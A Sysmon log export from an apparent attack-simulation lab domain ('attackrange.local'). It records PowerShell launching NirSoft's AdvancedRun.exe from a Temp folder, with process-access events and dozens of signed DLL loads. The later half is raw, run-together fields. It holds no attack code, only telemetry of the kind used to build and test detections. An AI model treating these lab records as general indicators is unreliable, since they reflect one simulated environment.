record 4011116, UtcTime 2022-01-21 18:44:23.914; SourceProcessGUID={834264DD-DB11-61EA-9500-000000002702}; SourceProcessId=428; SourceThreadId=5444; SourceImage=C:\Windows\Explorer.EXE; SourceUser=ATTACKRANGE\Administrator; GrantedAccess=0x1410; CallTrace=C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6163f|C:\Windows\System32\SHELL32.dll+62db0|C:\Windows\System32\TwinUI.dll+12d711|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791

record 4011115, UtcTime 2022-01-21 18:44:23.914; SourceProcessGUID={834264DD-DB11-61EA-9500-000000002702}; SourceProcessId=428; SourceThreadId=5444; SourceImage=C:\Windows\Explorer.EXE; SourceUser=ATTACKRANGE\Administrator; GrantedAccess=0x1000; CallTrace=C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+47bc0|C:\Windows\System32\SHELL32.dll+62d6c|C:\Windows\System32\TwinUI.dll+12d711|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791

record 4011114, UtcTime 2022-01-21 18:44:23.914; SourceProcessGUID={834264DD-DB11-61EA-9500-000000002702}; SourceProcessId=428; SourceThreadId=5444; SourceImage=C:\Windows\Explorer.EXE; SourceUser=ATTACKRANGE\Administrator; GrantedAccess=0x1000; CallTrace=C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61894|C:\Windows\System32\SHELL32.dll+62d40|C:\Windows\System32\TwinUI.dll+12d711|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791

record 4011113, UtcTime 2022-01-21 18:44:23.914; SourceProcessGUID={834264DD-DB11-61EA-9500-000000002702}; SourceProcessId=428; SourceThreadId=5444; SourceImage=C:\Windows\Explorer.EXE; SourceUser=ATTACKRANGE\Administrator; GrantedAccess=0x1410; CallTrace=C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\TwinUI.dll+12d549|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791

record 4011106, UtcTime 2022-01-21 18:44:23.742; SourceProcessGUID={834264DD-DAE7-61EA-1700-000000002702}; SourceProcessId=1300; SourceThreadId=3348; SourceImage=C:\Windows\System32\svchost.exe; SourceUser=NT AUTHORITY\SYSTEM; GrantedAccess=0x1400; CallTrace=C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791

record 4011105, UtcTime 2022-01-21 18:44:23.742; SourceProcessGUID={834264DD-DAE7-61EA-1700-000000002702}; SourceProcessId=1300; SourceThreadId=1340; SourceImage=C:\Windows\System32\svchost.exe; SourceUser=NT AUTHORITY\SYSTEM; GrantedAccess=0x1478; CallTrace=C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\System32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791

record 4011103, UtcTime 2022-01-21 18:44:23.742; SourceProcessGUID={834264DD-DAE4-61EA-0C00-000000002702}; SourceProcessId=652; SourceThreadId=2332; SourceImage=C:\Windows\system32\lsass.exe; SourceUser=NT AUTHORITY\SYSTEM; GrantedAccess=0x1000; CallTrace=C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791

Event ID 7 (image load) records. All are loads into the same AdvancedRun.exe process: ProcessGuid={834264DD-FF07-61EA-C905-000000002702}; ProcessId=3120; Image=C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe. Every loaded image has Product=Microsoft® Windows® Operating System; Company=Microsoft Corporation; Signed=true; Signature=Microsoft Windows; SignatureStatus=Valid; User=ATTACKRANGE\Administrator (the last record below is cut off in the export before those fields). The modules come from SysWOW64, Program Files (x86) or the x86 WinSxS assembly, consistent with AdvancedRun.exe running as a 32-bit image under WOW64.

record 4011112, UtcTime 2022-01-21 18:44:23.805; ImageLoaded=C:\Program Files (x86)\Common Files\Microsoft Shared\ink\tiptsf.dll; FileVersion=10.0.14393.4169 (rs1_release.210107-1130); Description=Touch Keyboard and Handwriting Panel Text Services Framework; OriginalFileName=TipTsf.dll; Hashes=MD5=917E8F9264946341B07DD6F1C2FF06C3,SHA256=5143C7496BD0ADF21693BB68661CD4967826485DE0A51F997309EFE4D86F21D6

record 4011111, UtcTime 2022-01-21 18:44:23.805; ImageLoaded=C:\Windows\SysWOW64\clbcatq.dll; FileVersion=2001.12.10941.16384 (rs1_release.210107-1130); Description=COM+ Configuration Catalog; OriginalFileName=CLBCATQ.DLL; Hashes=MD5=A5DBC147158A0FFB44246C9452A1C9E1,SHA256=D7763F384F902F00980FE6A2ED0F254AF0539B66AAABFF64413B0D17606000A9

record 4011110, UtcTime 2022-01-21 18:44:23.742; ImageLoaded=C:\Windows\SysWOW64\dwmapi.dll; FileVersion=10.0.14393.4169 (rs1_release.210107-1130); Description=Microsoft Desktop Window Manager API; OriginalFileName=dwmapi.dll; Hashes=MD5=F6B687A32ABAE8BE3B02C122B58D952F,SHA256=DF763BDC4348BBEA93375263BF88E0BCD1267C58FC0F6E994F6D778D302DDE85

record 4011109, UtcTime 2022-01-21 18:44:23.742; ImageLoaded=C:\Windows\SysWOW64\msvcp_win.dll; FileVersion=10.0.14393.2999 (rs1_release_inmarket.190520-1518); Description=Microsoft® C Runtime Library; OriginalFileName=msvcp_win.dll; Hashes=MD5=7BC54AA66588A3DF7B1448A4493C6663,SHA256=9CB1BA7C092164DAA14E21454606905E294D137AD72158F92A666077D7CF1946

record 4011108, UtcTime 2022-01-21 18:44:23.742; ImageLoaded=C:\Windows\SysWOW64\oleaut32.dll; FileVersion=10.0.14393.4402 (rs1_release.210426-1725); Description=OLEAUT32.DLL; OriginalFileName=OLEAUT32.DLL; Hashes=MD5=0D885953D657434CA5015545A364BDB9,SHA256=1D29921E136F84B4CA9F1EBD646CFFF4571EA805A6CC5BC1F7C7784CC3246088

record 4011107, UtcTime 2022-01-21 18:44:23.742; ImageLoaded=C:\Windows\SysWOW64\msctf.dll; FileVersion=10.0.14393.4530 (rs1_release.210705-0736); Description=MSCTF Server DLL; OriginalFileName=MSCTF.DLL; Hashes=MD5=2BE98799BE75460B5BFC4B7AAE16F1C0,SHA256=79206EE81A33F14D2EEA028AE188923A24C6E0E2FAFF10F2B58F265C69D13CBC

record 4011104, UtcTime 2022-01-21 18:44:23.742; ImageLoaded=C:\Windows\SysWOW64\uxtheme.dll; FileVersion=10.0.14393.4169 (rs1_release.210107-1130); Description=Microsoft UxTheme Library; OriginalFileName=UxTheme.dll; Hashes=MD5=E1A1B98F2AD180FA2117A56D869E5830,SHA256=2D9711E9D549CCB441EF21F72F08FB4EACD5F2990193C6FFFC7E7AC92FA6E670

record 4011102, UtcTime 2022-01-21 18:44:23.727; ImageLoaded=C:\Windows\SysWOW64\imm32.dll; FileVersion=10.0.14393.0 (rs1_release.160715-1616); Description=Multi-User Windows IMM32 API Client DLL; OriginalFileName=imm32; Hashes=MD5=203F58BA41B48A59D6A047E0233DB422,SHA256=4204F7C2B4E13AA3819A180FACA724435F6400FE97D2EF6C74634A0D7E51F7F3

record 4011101, UtcTime 2022-01-21 18:44:23.727; ImageLoaded=C:\Windows\SysWOW64\ole32.dll; FileVersion=10.0.14393.4651 (rs1_release.210911-1554); Description=Microsoft OLE for Windows; OriginalFileName=OLE32.DLL; Hashes=MD5=935CA0F4A51D83AED974E5D589AB41E7,SHA256=C2D64CAE0D03B259EE0B27CE8012710B80DB3A5D1DFCA1ACB2018712A4DC294D

record 4011100, UtcTime 2022-01-21 18:44:23.727; ImageLoaded=C:\Windows\SysWOW64\kernel.appcore.dll; FileVersion=10.0.14393.2312 (rs1_release.180607-1919); Description=AppModel API Host; OriginalFileName=kernel.appcore.dll; Hashes=MD5=4BA1C50E6607AE70495B58874963B901,SHA256=72BBBB4145E058C3B12504AC0EC128CD44E282D40959D018192899276A2B9C69

record 4011099, UtcTime 2022-01-21 18:44:23.727; ImageLoaded=C:\Windows\SysWOW64\advapi32.dll; FileVersion=10.0.14393.4886 (rs1_release.220104-1735); Description=Advanced Windows 32 Base API; OriginalFileName=advapi32.dll; Hashes=MD5=0887C15A40AA6286ABACDF5FA5EADFC8,SHA256=C031E35864A113C505E5E1CCBF9BE34164823C67E41604A60276D1B89ACE08D7

record 4011098, UtcTime 2022-01-21 18:44:23.727; ImageLoaded=C:\Windows\SysWOW64\powrprof.dll; FileVersion=10.0.14393.0 (rs1_release.160715-1616); Description=Power Profile Helper DLL; OriginalFileName=POWRPROF.DLL; Hashes=MD5=A6F22CA344FD1B7D75D49ECC718693C8,SHA256=C7787F59263B7D5246B931531AB4DC4C430E1BF8260775B7A751D4994A5D3489

record 4011097, UtcTime 2022-01-21 18:44:23.727; ImageLoaded=C:\Windows\SysWOW64\windows.storage.dll; FileVersion=10.0.14393.4886 (rs1_release.220104-1735); Description=Microsoft WinRT Storage API; OriginalFileName=Windows.Storage.dll; Hashes=MD5=B77BEE429FC293E60D82B5733F3823EE,SHA256=7CA6CF34FBB9CDF160018C81B9D3A1894477918A67BA53E728689041DEA4C646

record 4011096, UtcTime 2022-01-21 18:44:23.727; ImageLoaded=C:\Windows\SysWOW64\cfgmgr32.dll; FileVersion=10.0.14393.0 (rs1_release.160715-1616); Description=Configuration Manager DLL; OriginalFileName=CFGMGR32.DLL; Hashes=MD5=90A1CD387F9CB30F86D34B88BFCD83A1,SHA256=5F6CE9777CDC7B0A0E98C90709C41C379415DBA654A39B332BB683A7F2B86E97

record 4011095, UtcTime 2022-01-21 18:44:23.727; ImageLoaded=C:\Windows\SysWOW64\shell32.dll; FileVersion=10.0.14393.4886 (rs1_release.220104-1735); Description=Windows Shell Common Dll; OriginalFileName=SHELL32.DLL; Hashes=MD5=F27E9ABE4DCD6E5CD27820AF12993889,SHA256=D67BA8D05C35C53CC669CFEB2FAA8139D389257EFE5209781438B4043694A763

record 4011094, UtcTime 2022-01-21 18:44:23.727; ImageLoaded=C:\Windows\SysWOW64\shlwapi.dll; FileVersion=10.0.14393.4169 (rs1_release.210107-1130); Description=Shell Light-weight Utility Library; OriginalFileName=SHLWAPI.DLL; Hashes=MD5=0FDEB9236FF287E329F2EF155BA8AE56,SHA256=5F0C2A29312C82D14B8B42D2B6AAFEB82EBAD20822B603FD162E6AAF39B06C95

record 4011093, UtcTime 2022-01-21 18:44:23.727; ImageLoaded=C:\Windows\SysWOW64\sechost.dll; FileVersion=10.0.14393.4886 (rs1_release.220104-1735); Description=Host for SCM/SDDL/LSA Lookup APIs; OriginalFileName=sechost.dll; Hashes=MD5=7635DDA92A9ACC5A31C18AF7B31DDF6D,SHA256=0BD8A481DF3DE0170DD1569F588AE70B9BB9D5C4DD34944F72208B9DEEF76BB6

record 4011092, UtcTime 2022-01-21 18:44:23.727; ImageLoaded=C:\Windows\SysWOW64\SHCore.dll; FileVersion=10.0.14393.4169 (rs1_release.210107-1130); Description=SHCORE; OriginalFileName=SHCORE.dll; Hashes=MD5=E3851CE4A433475612CB0E1552A733E3,SHA256=F391BAA7AFF5734842737FC1B4C58856BA5E409A7B97C037995F0F26150A85FA

record 4011091, UtcTime 2022-01-21 18:44:23.727; ImageLoaded=C:\Windows\SysWOW64\bcryptprimitives.dll; FileVersion=10.0.14393.4770 (rs1_release.211101-1440); Description=Windows Cryptographic Primitives Library; OriginalFileName=bcryptprimitives.dll; Hashes=MD5=6215B591FCA75825262B29613A48836C,SHA256=B34EED73CE76E4AA1A0812E9BE1AE093549B164341F988CA877E27E545C3C1B8

record 4011090, UtcTime 2022-01-21 18:44:23.727; ImageLoaded=C:\Windows\SysWOW64\comdlg32.dll; FileVersion=10.0.14393.4283 (rs1_release.210303-1802); Description=Common Dialogs DLL; OriginalFileName=comdlg32.dll; Hashes=MD5=A7152A41A642F6976B4226FA6A22F48D,SHA256=2DBDB16F905A9150669B9017D5C4A0AE75DBB6E52298F0FEFE1849C3FC5D9909

record 4011089, UtcTime 2022-01-21 18:44:23.727; ImageLoaded=C:\Windows\SysWOW64\cryptbase.dll; FileVersion=10.0.14393.0 (rs1_release.160715-1616); Description=Base cryptographic API DLL; OriginalFileName=cryptbase.dll; Hashes=MD5=3D4308BAC53B881B16D9BD1006ABDC65,SHA256=26DF85FC22F9FCAA2212CB66612FE8F5CC6382953FE81B9C34128E43080C7891

record 4011088, UtcTime 2022-01-21 18:44:23.727; ImageLoaded=C:\Windows\SysWOW64\sspicli.dll; FileVersion=10.0.14393.4704 (rs1_release.211004-1917); Description=Security Support Provider Interface; OriginalFileName=security.dll; Hashes=MD5=CF0985D6545196D0EBDCB6C2630BBDC1,SHA256=1990B384CE1E1809B90D617506DEF24E654CE7A4E93C5BDCD718DED2ECCC53A8

record 4011087, UtcTime 2022-01-21 18:44:23.727; ImageLoaded=C:\Windows\SysWOW64\gdi32full.dll; FileVersion=10.0.14393.4886 (rs1_release.220104-1735); Description=GDI Client DLL; OriginalFileName=gdi32; Hashes=MD5=AB5AE3CC1EAA79B84589257A14BC2480,SHA256=BD0216233D84012BD61BE38964798F8F6686DA61E2E8E04D1B395AB8566CA084

record 4011086, UtcTime 2022-01-21 18:44:23.727; ImageLoaded=C:\Windows\SysWOW64\profapi.dll; FileVersion=10.0.14393.0 (rs1_release.160715-1616); Description=User Profile Basic API; OriginalFileName=PROFAPI.DLL; Hashes=MD5=CA6447DDCA724F0C5C0CAFDE184EFE64,SHA256=F9664337B60A332571FCA81CC3E6DD194DCE20C8546980FD283CA892D0CC873C

record 4011085, UtcTime 2022-01-21 18:44:23.727; ImageLoaded=C:\Windows\SysWOW64\rpcrt4.dll; FileVersion=10.0.14393.4886 (rs1_release.220104-1735); Description=Remote Procedure Call Runtime; OriginalFileName=rpcrt4.dll; Hashes=MD5=8F533DC30B7304908AD1430FA64A8D05,SHA256=04FF1C778A63457B291BFD40C0A782A13E0D87E32707FA4BAEC728847299776C

record 4011084, UtcTime 2022-01-21 18:44:23.727; ImageLoaded=C:\Windows\SysWOW64\gdi32.dll; FileVersion=10.0.14393.4169 (rs1_release.210107-1130); Description=GDI Client DLL; OriginalFileName=gdi32; Hashes=MD5=E9E209227AF7EFBFDAAA0B932251486D,SHA256=639DD063669F506790DA8C940E3BEBE4F7CF31668260F94CF5A67C93021D2BDF

record 4011083, UtcTime 2022-01-21 18:44:23.727; ImageLoaded=C:\Windows\SysWOW64\ucrtbase.dll; FileVersion=10.0.14393.3659 (rs1_release_1.200410-1813); Description=Microsoft® C Runtime Library; OriginalFileName=ucrtbase.dll; Hashes=MD5=F058FE3C5E3DEF875A654A18551D88E5,SHA256=78DC0394AA359DBD2EB8BE7F13FEDF0478C8AA55785712B358FAC1C97D051B87

record 4011082, UtcTime 2022-01-21 18:44:23.727; ImageLoaded=C:\Windows\SysWOW64\combase.dll; FileVersion=10.0.14393.4886 (rs1_release.220104-1735); Description=Microsoft COM for Windows; OriginalFileName=COMBASE.DLL; Hashes=MD5=55DECBF64D495E410E82FD446739CA2B,SHA256=B1D480739AB21426FF289E043F9751849BEBA477F3C9E88E5F21F96E16A9B1B0

record 4011081, UtcTime 2022-01-21 18:44:23.727; ImageLoaded=C:\Windows\SysWOW64\win32u.dll; FileVersion=10.0.14393.0 (rs1_release.160715-1616); Description=Win32u; OriginalFileName=Win32u.DLL; Hashes=MD5=AF2A9437F3AED2E8254B7E1EB6E96782,SHA256=D8F3C957BDBD9DB510E71B07CDE1B446491D4DC520787548060B3AAD1324C62A

record 4011080, UtcTime 2022-01-21 18:44:23.727; ImageLoaded=C:\Windows\SysWOW64\version.dll; FileVersion=10.0.14393.0 (rs1_release.160715-1616); Description=Version Checking and File Installation Libraries; OriginalFileName=VERSION.DLL; Hashes=MD5=181FE38C3FE164FBFC1A5A8399CCC2DA,SHA256=233C31D9FC1C50A3E0688C1E778D356B419ED4A70D7B6870CA7631E4FE5C2AF9

record 4011079, UtcTime 2022-01-21 18:44:23.727; ImageLoaded=C:\Windows\SysWOW64\userenv.dll; FileVersion=10.0.14393.4583 (rs1_release.210730-1850); Description=Userenv; OriginalFileName=userenv.dll; Hashes=MD5=53FEB2DF5A3001CEE00158E46CF1F1C2,SHA256=9D4DC493975065C4595DB62DCB0828631D9CF6019C9A82AA0384D65A8E6A62C7

record 4011078, UtcTime 2022-01-21 18:44:23.727; ImageLoaded=C:\Windows\WinSxS\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_c58df2c997bddaf8\comctl32.dll; FileVersion=6.10 (rs1_release.210107-1130); Description=User Experience Controls Library; OriginalFileName=comctl32.DLL; Hashes=MD5=9BA49461346F5B2DAFE81E401E884241,SHA256=297B46C95521B8EB59B3793F0ED2736F39C495D2C3D622638EE9205F53E69EFD

record 4011077, UtcTime 2022-01-21 18:44:23.727; ImageLoaded=C:\Windows\SysWOW64\user32.dll; FileVersion=10.0.14393.4169 (rs1_release.210107-1130); Description=Multi-User Windows USER API Client DLL; OriginalFileName=user32; Hashes=MD5=318804DFF282AE5C2FEF5577057CB913,SHA256=A65C5C3F38A793F0C59C1A4553940D6D236CE2BC3380898E865BF0E1F80FEE8C

record 4011076, UtcTime 2022-01-21 18:44:23.727; ImageLoaded=C:\Windows\SysWOW64\msvcrt.dll; FileVersion=7.0.14393.2457 (rs1_release_inmarket.180822-1743); Description=Windows NT CRT DLL; OriginalFileName=msvcrt.dll; Hashes=MD5=F3B7F231407DD207CABC94C9347984AC,SHA256=053A1D95EEB426416278D2AD7D584FDD984A8B445CC88B46785AB8666383FB0B

record 4011075, UtcTime 2022-01-21 18:44:23.727; ImageLoaded=C:\Windows\SysWOW64\KernelBase.dll; FileVersion=10.0.14393.4886 (rs1_release.220104-1735); Description=Windows NT BASE API Client DLL; OriginalFileName=Kernelbase.dll; Hashes=MD5=4AA859ECE1E241F213E977FB1FC58E4F,SHA256=E6E772658EFC1276B673EA096F76B1ED8E0013C9DD81FEBA76C042E08FA6AC31

record 4011074, UtcTime 2022-01-21 18:44:23.727; ImageLoaded=C:\Windows\SysWOW64\kernel32.dll; FileVersion=10.0.14393.4651 (rs1_release.210911-1554); Description=Windows NT BASE API Client DLL; Product=Microsoft® Windows® Operating System; Company=Microsoft 
Corporationkernel32MD5=B7507287901F3605BC754109D6EA1B04,SHA256=7E2697685399C687ABB501AE3A6F19EAA50E5C0457F8FEFAC87C05F0C0F31DB1trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004011073Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:44:23.727{834264DD-FF07-61EA-C905-000000002702}3120C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\System32\wow64cpu.dll10.0.14393.3503 (rs1_release.200131-0410)AMD64 Wow64 CPU Microsoft® Windows® Operating SystemMicrosoft Corporationwow64cpu.dllMD5=C1F2078639481364EA3FDD10CBEB1A18,SHA256=B63E6DC0B3D7ABA9CB95929A1A360208A570CB2072474276F649B68F1AC8DC82trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004011072Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:44:23.727{834264DD-FF07-61EA-C905-000000002702}3120C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\System32\user32.dll10.0.14393.4169 (rs1_release.210107-1130)Multi-User Windows USER API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationuser32MD5=883B59C5557E8A9B3C1E1ED1CA48CD5A,SHA256=271800C20A96587265BF83DE2EFC11329EEB2B6C0D57E5E0BCD137FB96BFE6E3trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004011071Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:44:23.727{834264DD-FF07-61EA-C905-000000002702}3120C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\System32\kernel32.dll10.0.14393.4651 (rs1_release.210911-1554)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel32MD5=0AAB61CE538011C286B367815A98E5EE,SHA256=C5895455873186AA467ECC9DBF9C2F73A0AEC5CF5E1357C0700D88D20DE2412FtrueMicrosoft WindowsValidATTACKRANGE\Administrator 
734700x80000000000000004011070Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:44:23.727{834264DD-FF07-61EA-C905-000000002702}3120C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\kernel32.dll10.0.14393.4651 (rs1_release.210911-1554)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel32MD5=B7507287901F3605BC754109D6EA1B04,SHA256=7E2697685399C687ABB501AE3A6F19EAA50E5C0457F8FEFAC87C05F0C0F31DB1trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004011069Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:44:23.727{834264DD-FF07-61EA-C905-000000002702}3120C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\System32\kernel32.dll10.0.14393.4651 (rs1_release.210911-1554)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel32MD5=0AAB61CE538011C286B367815A98E5EE,SHA256=C5895455873186AA467ECC9DBF9C2F73A0AEC5CF5E1357C0700D88D20DE2412FtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004011068Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:44:23.727{834264DD-FF07-61EA-C905-000000002702}3120C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\System32\wow64win.dll10.0.14393.3383 (rs1_release.191125-1816)Wow64 Console and Win32 API LoggingMicrosoft® Windows® Operating SystemMicrosoft Corporationwow64lg2.dllMD5=62DEBA17D0A26B352F1C3F02144BC6EA,SHA256=5A1C08FE318942CB31048DBD641E25610DE842E34470B3E54FEDCA4E2642D4E0trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004011067Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
18:44:23.727{834264DD-FF07-61EA-C905-000000002702}3120C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\System32\wow64.dll10.0.14393.3503 (rs1_release.200131-0410)Win32 Emulation on NT64Microsoft® Windows® Operating SystemMicrosoft Corporationwow64.dllMD5=447615F19DAAFF9C308370C59F493BF8,SHA256=45ED2009CEEB249BBF518B958AF02B97E667DB68C9B6D65642E69E9B0300CF5DtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004011066Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:44:23.727{834264DD-FF07-61EA-C905-000000002702}3120C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\ntdll.dll10.0.14393.4886 (rs1_release.220104-1735)NT Layer DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationntdll.dllMD5=F77A39FFEEFDA237A5730A71A2EB3B83,SHA256=A4D72013A219DA259858A19C3A2807FF88C1E874621AEF666D05C65E9257C9B3trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004011065Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:44:23.727{834264DD-FF07-61EA-C905-000000002702}3120C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\System32\ntdll.dll10.0.14393.4886 (rs1_release.220104-1735)NT Layer DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationntdll.dllMD5=F0A74A939E7B2E1C0B392CEB2D3EB71B,SHA256=CD6382FF8FDEF8C08C62576D80C981E6E1C966E95874007EFE047BD136BF954CtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004011064Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:44:23.727{834264DD-FF07-61EA-C905-000000002702}3120C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe1.50Run a program with different settings that you 
choose.AdvancedRunNirSoftAdvancedRun.exeMD5=2F06A497BACD1F270363B22A3498BDC2,SHA256=8EF8957A60BC02849E0CDE21278C7432F4782E27559CEECE306FEF2CDA70CEE8trueNir SoferValidATTACKRANGE\Administrator 10341000x80000000000000004011063Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:44:23.711{834264DD-DAF8-61EA-5B00-000000002702}41004280C:\Windows\system32\csrss.exe{834264DD-FF07-61EA-C905-000000002702}3120C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179fNT AUTHORITY\SYSTEMATTACKRANGE\Administrator 10341000x80000000000000004011062Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:44:23.711{834264DD-E497-61EA-F301-000000002702}9444688C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{834264DD-FF07-61EA-C905-000000002702}3120C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\d2fec25a57171882b3ac890135fca30b\System.ni.dll+384146|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\d2fec25a57171882b3ac890135fca30b\System.ni.dll+2c4809|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\d2fec25a57171882b3ac890135fca30b\System.ni.dll+2c4179|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+15c0099|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a434f2|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a4312d|C:\Windows\assembly\Na
